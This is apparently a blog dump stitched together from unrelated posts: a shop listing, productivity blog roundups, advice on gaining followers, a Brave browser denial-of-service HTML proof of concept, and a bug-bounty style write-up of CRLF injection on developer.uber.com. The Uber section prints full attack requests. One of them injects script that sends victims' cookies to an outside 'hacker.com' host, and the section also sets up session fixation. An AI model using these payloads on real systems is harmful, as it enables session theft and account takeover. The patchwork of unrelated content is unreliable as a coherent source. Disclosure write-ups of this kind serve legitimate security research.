BRAVE BROWSER DOS

Brave.html file
<html>
<title>Brave Window Object  Remote Denial of Service.</title>
<head></head>

<body><br><br>
<h1><center>Brave Window Object  Remote Denial of Service</center></h1><br><br>
<h2><center>Proof of Concept</center></br></br> </h2>


<center>
<b>Click the  below link to Trigger the Vulnerability..</b><br><br>
<hr></hr>

<hr></hr>
<b><center><a href="javascript:window.close(self);">Brave  Window Object  DoS Test POC</a></center>

</center>
</body>


</html>

The Mara bag

Pop-Up Shop: The Mara Bag

Today I have for sale one of my favorite items I've ever owned.  :) 

You could say I'm very excited to post this. 

The Mara Bag - (3) Available

Price: $15

Productivity blogs(which can change your life) -2

7. Dumb Little Man aims to make your life and work more efficient

Dumb Little Man writes about “anything that makes life and work more efficient, more profitable, and, um, easy.” Started in 2006, the blog’s creator notes on the site that, to this day, he’s “not sure where the name Dumb Little Man came from.” — 1-2 posts per day

• 6 Unconventional, But Scientific Ways To Be The Happiest Person On Earth - 946 shares
• There Are Huge Health Benefits of Drinking Water But How Much Should You Really Drink? - 390 shares
• 6 Easy To Install Productivity Habits - 223 shares

8. The Fast Track gives you tools to get the job done fast

The Fast Track presents “tools to get the job done fast.” The blog is a product of Intuit's online database software Quickbase. — 1 post per day

• The Best Work Advice I Ever Received – Reader Top 10 List - 756 shares
• 10 Ways You’re Making Your Employees Less Productive - 726 shares
• Want to Be More Productive at Work? Know Your People Style - 164 shares

9. Time Management Ninja helps get more done with minimal effort

Time Management Ninja focuses on time management, productivity, clutter and wasted time. It’s the personal blog of Craig Jarrow, who began the project in 2009. — 3 posts per week

• Email Is Not Your Job - 563 shares
• 21 Ways to Define a Positive Attitude - 551 shares
• 10 Bad Productivity Habits That Are Holding You Back - 367 shares

10. Pick the Brain is dedicated to self improvement

Pick the Brian shares information on personal productivity, motivation and self education. Launched in 2006, the blog says it diverges from traditional “self-help” by taking a broader approach. — 1 post per day

• 5 Differences Between Optimists And Pessimists - 578 shares
• The 7 Habits Happy People DON’T Have - 576 shares
• 6 Ways to Instantly Improve Your Mood - 488 shares

11. WorkAwesome wants you to work better

WorkAwesome shares knowledge about starting, completing and trying new things. Tina Su started the blog in 2008 after serving as a software engineer and user-experience designer at Amazon. — 2-3 posts per week

• 7 Steps to Beat Procrastination - 241 shares
• How Naps Can Increase Your Productivity - 198 shares
• 6 Ways to Get More Done - 195 shares

12. Asian Efficiency is two friends sharing tips

Asian Efficiency shows ways to complete daily tasks, projects and assignments in the optimal time possible. Two friends started the blog after encouragement from comrades of theirs who turned to them for productivity advice. — 2-3 posts per week

• 5 Tips For Writing Productive Email Subject Lines - 275 shares
• 21 Examples of Eating Your Frog - 139 shares

Productivity blogs (which can change your life)-1

Hi all,

As makers of a platform that increases productivity, we’re big fans of other products and resources that help individuals in the same way. Last week, we shared our 10 favorite new productivity apps from 2013, and now as we kick off the year, we’re sharing a sample of our team’s productivity reading list.

For each outlet, we’ve dug up three popular posts from last year based on social media sharing numbers—a “shares” tally from Facebook, Twitter, Google+ and LinkedIn. To find this number, we relied on Moz’s Open Site Explorer and the more simpler ShareTally, two great tools that help reveal a site’s traffic and social virality. Each description also features the publishing frequency of the blog, a number garnered from Michael Shipley’s RSS Feed Analyzer.

1. Buffer is big on life hacks and social media tips

Buffer blogs about productivity, life hacks, writing, user experience, customer happiness and business. The three-year-old startup might be better known for its social media sharing tool, but it’s quickly building up a reputation for its writing, too. — 3-4 posts per week

• 10 Simple Things You Can Do Today That Will Make You Happier, Backed By Science - 61,795 shares
• Why Facebook is blue: The science of colors in marketing - 13,481 shares
• 10 Surprising social media statistics that might make you rethink your social strategy - 8,414 shares

2. Lifehacker is a fire hose of tips and tricks

Lifehacker shares tips, tricks and downloads for getting things done. This blog is the granddaddy of the group, getting its start in January 2005, and earning loads of accolades since, including TIME’s "25 Sites We Can't Live Without" in 2006. — 1 post per hour

• How Long to Nap for the Biggest Brain Benefits - 62,793 shares
• I've Been Using Evernote All Wrong. Here's Why It's Actually Amazing - 6,285 shares
• The 50 Free Apps We're Most Thankful For - 4,699 shares

3. Marc and Angel Hack Life lends practical tips, personal experience

Marc and Angel Hack Life offers inspirational advice and practical tips for life. The husband-and-wife blogging duo, who have been at it since 2006, also share opinions on noteworthy events and people in and around their lives. — 3 posts per week

• 10 Choices You Will Regret in 10 Years - 39,766 shares
• 9 Things Happy, Successful People Choose to Ignore - 4,667 shares
• 10 Things You Should Never Say About Yourself - 4,423 shares

4. Lifehack focuses on getting things done efficiently and effectively

Lifehack offers advice, resources, tips and tricks to help you get things done more efficiently and effectively. Like similarly named blog Lifehacker, Lifehack is a veteran at dispersing such tips, too, getting its start the same year, 2005. — 1 post per hour

• 13 Things Mentally Strong People Don’t Do - 190,934 shares
• 25 Killer Websites that Make You Cleverer - 26,966 shares
• You Can Easily Learn 100 TED Talks Lessons In 5 Minutes Which Most People Need 70 Hours For - 9,665 shares

5. 99U empowers you to execute ideas

99U offers insights on creativity and productivity. The blog is a product of online portfolio site Behance, which calls the online publication the “missing curriculum” for making ideas happen. — 1 post per day

• The 5 Most Dangerous Creativity Killers - 6,331 shares
• Get Over Yourself: How Your Ego Sabotages Your Creativity - 4,324 shares
• 7 Ways to Boost Your Creativity - 3,539 shares

Uber (CRLF attack) hacks

Hi all,

The website located at https://developer.uber.com/ suffers from CRLF injection. This allows me to inject JavaScript, HTML as well as arbitrary HTTP Headers. Besides this, I can change the HTTP Response code as well, to display whatever I want in the victim's browser.

The vulnerability resides in the path https://developer.uber.com/dashboard

Please note that navigating to this website as is, without logging in will give a 302 redirect to the login page. However, if we can send the following HTTP Request:

GET /dashboard/%0d%0aContent-Type: text/html%0d%0aHTTP/1.1 200 OK%0d%0aSet-Cookie: oauth2_sid="r0Fs96ZB7tKfqSQ56jY7IlReA3wuF3o4/cLwQ02Pn8hdWLEfnkcD5Nc9ITruyiyUlNOTXu/le7IQLC9tNdvdEoiZYPZC3OXa7ZNQU4sT9ZGFQzF3kSyL8c8BgGGEWqH6"%0d%0a%0d%0a%3Chtml%3EHacker Content%3C/html%3E%0d%0a%0d%0a%3Cscript%3Ealert("Injected js")%3C/script%3E%0d%0a%0d%0a<!-- HTTP/1.1
Host: developer.uber.com
Referer: https://developer.uber.com/
Cookie: XSRF-TOKEN=OkkZ43igro0JS7lm%2B2pdjhh1%2FzzqkueR%2Fgfs4%3D; connect.sid=s%3AHgMm40tOJjVdF6js3Oxv8GP4.RE%2F3fmd02tETNwUaC8AhFzUhLSqsjcCYZo5NsgP%2BTf8;
Host: developer.uber.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Connection: close

The HTTP Response contains the injected HTTP Headers and the Cookie!

So apparently, the Web Application Server parses the current path of the web application (Which in this case is /dashboard) and just appends it to the Location header. So if we change the "Location" i.e. /dashboard/ to /dashboard/%0d%0aHeader: Random, then in the HTTP Response, the %0d%0a will create a new line following by a new header, "Header: Random".

Hence using injected Line breaks (CRLFs), we are able to add new HTTP Headers and content.

The Response is as follows:

HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 25 Mar 2016 15:17:54 GMT
Content-Type: text/html
Content-Length: 154
Location: https://developer.uber.com/dashboard/
Content-Type: text/html
HTTP/1.1 200 OK
Set-Cookie: oauth2_sid="r0Fs96ZB7tKfqSQ56jY7IlReA3wuF3o4/cLwQ02Pn8hdWLEfnkcD5Nc9ITruyiyUlNOTXu/le7IQLC9tNdvdEoiZYPZC3OXa7ZNQU4sT9ZGFQzF3kSyL8c8BgGGEWqH6"

<html>Hacker Content</html>

<script>alert("Injected js")</script>

<!--
Connection: close
Set-Cookie: oauth2_sid=deleted; path=/; Expires=Thu, 01-Jan-1970 00:00:01 GMT
Strict-Transport-Security: max-age=0
X-XSS-Protection: 1; mode=block
Cache-Control: max-age=0

<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

As is evident from the Response, both the HTML and Javascript injections work. The first image screenshot of the HTTP Response Render. The rendering of the JavaScript makes this a Cross-Site Scripting vulnerability as well, and since the cookies aren't "Secure" and "HttpOnly" (bugs which aren't allowed in the bounty! ;]), they can easily be extracted by JavaScript and POSTed to my server, making it a Cookie Stealing vulnerability as well. Using this HTTP Request:

GET /dashboard/%0d%0aContent-Type: text/html%0d%0aHTTP/1.1 200 OK%0d%0aSet-Cookie: oauth2_sid="r0Fs96ZB7tKfqSQ56jY7IlReA3wuF3o4/cLwQ02Pn8hdWLEfnkcD5Nc9ITruyiyUlNOTXu/le7IQLC9tNdvdEoiZYPZC3OXa7ZNQU4sT9ZGFQzF3kSyL8c8BgGGEWqH6"%0d%0a%0d%0a%3Chtml%3EHacker Content%3C/html%3E%0d%0a%0d%0a%3Cscript%3Evar+img=new+Image();img.src="http://www.hacker.com/incoming.php?coo="%20+%20document.cookie;%3C/script%3E%0d%0a%0d%0a<!-- HTTP/1.1
Host: developer.uber.com
Referer: https://developer.uber.com/
Cookie: XSRF-TOKEN=OkkZ43igro0JS7lm%2B2pdjhh1%2FzzqkueR%2Fgfs4%3D; connect.sid=s%3AHgMm40tOJjVdF6js3Oxv8GP4.RE%2F3fmd02tETNwUaC8AhFzUhLSqsjcCYZo5NsgP%2BTf8;
Host: developer.uber.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Connection: close

Finally, the setting of arbitrary Cookies also renders the Web Application to a Session Fixation vulnerability, wherein, I can set an arbitrary cookie in the GET request and wait for the victim to click on the link and login. In this case, the cookie which I've set will then identify the victim's account. Using the same cookie in my browser will authenticate the attacker to his account as well.

10 BEST WAY TO INCREASE FOLLOWERS IN ANY SOCIAL MEDIA

Hi all,

There are many bloggers looking to gain followers on their new or established blogs. One of the most common questions of new bloggers is, "How can I gain more followers?". While the number of followers is not important to some, we understand wanting to grow your readership is important to many. Please note, if you are a new blogger gaining followers will not always equal gaining readers, the two are not always the same. For more information check out, "My Blog Numbers: Readers vs. Followers". However, if it is followers you are looking to gain, here are a few useful ways to meet other bloggers and gain followers:

IF YOU ARE LOOKING TO GAIN FOLLOWERS YOU MUST MUST MUST HAVE A WAY FOR BLOGGERS TO FOLLOW YOU!

It is very difficult and frustrating for bloggers to stop by your blog to follow you only to find out that you have given them no means by which to do so.

PLEASE, get yourself the Blogger friends widget. This makes it MUCH easier for bloggers to follow you easily and quickly, post it where it is visible and easy to find. If you insist on not having this then post a way to follow you via RSS.

Following are a few great ways to gain followers for your blog:

1) Blog Hops- Love, love, love blog hops. They are a bit time consuming but they are a wonderful way to meet new bloggers, find blogs to follow, and gain followers on your own blog. For more information on blog hops check out this post, "What Is A Blog Hop Anyway?". You can also find a list of member blog hops here on our blog hop list.

2) Giveaways- When I first started blogging, I gained a great deal of followers during my 1st giveaway. This may want to be something you do once you hit 100 followers that way you have people to spread the word. Also, think of something really great to giveaway, the greater the gift the more people who will want to participate. By great, I mean something that many bloggers would want- a gift card, a piece of jewelry, a book if you are a book blogger, etc.. IT DOES NOT HAVE TO BE A LOT OF MONEY just something fun. Male sure your #1 way to enter is to follow you on your blog, you can then join giveaway hops to promote your giveaway among other things. We will soon have some great information on giveaways, as it is one of our upcoming Blog Talk topics so stay tuned if you are interested!

3) Blog Events- There are 2 ways in which blog events can be useful in gaining followers:

A) You become a sponsor-  when you sponsor an event the host of whom you are sponsoring usually promotes your blog beforehand. Then during the event, one of the requirements is to follow you. Additionally, many hosts also allow multiple ways to enter like following you on Facebook and twitter. So you offer them something to give away during the event and in return you get a lot of publicity and thus more followers! You can find lots of events that need sponsors in our group:Blog Sponsor Connection or contact the hosts of any events on our events page.

B) Participating in blog events is also a good way to gain followers, you will not gain as many as if you are a sponsor but you will find a lot of new blogs to follow and if you leave comments you may get a few followers in return.

4) Comment, Comment, Comment!- leaving comments is almost always a surefire way to gain followers. As a blogger you know that it is hard to get readers to leave comments so when people do bloggers like to stop by and see who has left a comment for them. If you use your Google account your name should be linked to your blog or profile. make sure you have your blog listed on your Blogger profile. PLEASE, do not leave a comment only asking a blogger to stop by your blog and follow you, instead comment on their post or blog, let them know you are now following them and then you can then say something like "I'd love to have you stop by my blog if you have time"- however, most will stop by without you asking them to.

5) Blog Challenges- Blog challenges, also know as blogfests, are a fun way to meet new bloggers, gain followers, and kick up your blog posts. The way challenges work is a host will post post details, most challenges are a month long. Every day the host will post a topic that you will write a blog post on, once your write your post you leave a link on the hosts site to your post. Everyone participating lists their links to their daily post on the topic, so you can stop by, comment, and follow them and they do the same in return.

6) Communities- One of the main reasons for creating this community was to connect bloggers! Communities are a great way to meet new bloggers and gain followers. The great thing is there is tons of communities, if you are not a member of our community you can join here. Blogfrog is another community based opportunity to gain followers and there are tons of others just Google Blogging communities!

7) Share your posts on Twitter- You can set up your posts to auto post to twitter. This is a great way to promote your posts and maybe get a few new followers. be sure your posts include some key words that may interest others. Also, make sure you have added your blog url to your twitter profile, I can't tell you how many times I have found someone interesting on twitter and then I can't find a url to their blog or website.

8) Share a link on Facebook- Facebook also allows you to auto post your blog posts to your wall. This is a great way to let people who follow you on Facebook know about your posts and blog. With a link on the auto post, this brings in new readers. new followers. Again, remember on your Facebook profile to list your blog address.

9) Write Guest Posts- Many bloggers are looking for guest bloggers to write a post on their niche, or even feature. This is a great way to promote your blog. The author of the blog that you are guest posting on will link back to your site allowing others to stop by, visit, and possible follow. If you are sure where to find blogs to guest post on, Melissa started a great group here to connect those who are looking for guest bloggers, you can check out her group Guest Post to see what its all about!

10) Content Counts- One way to get more followers is to get more traffic, to get more traffic you need to be writing quality content. By high quality we just mean remember your audience, try to post on a regular basis and maybe brush up on your SEO tools. 

Above all remember that the amount of followers you have does not determine the success of your blog. Don't get too caught up on a number. Growing your blog takes time. You could have 1000 followers and only 100 readers, meaning just because someone followers your blog does not mean they are an active follower who stops by and reads your posts and that's okay. Be patient and with time your blog readership is bound to grow.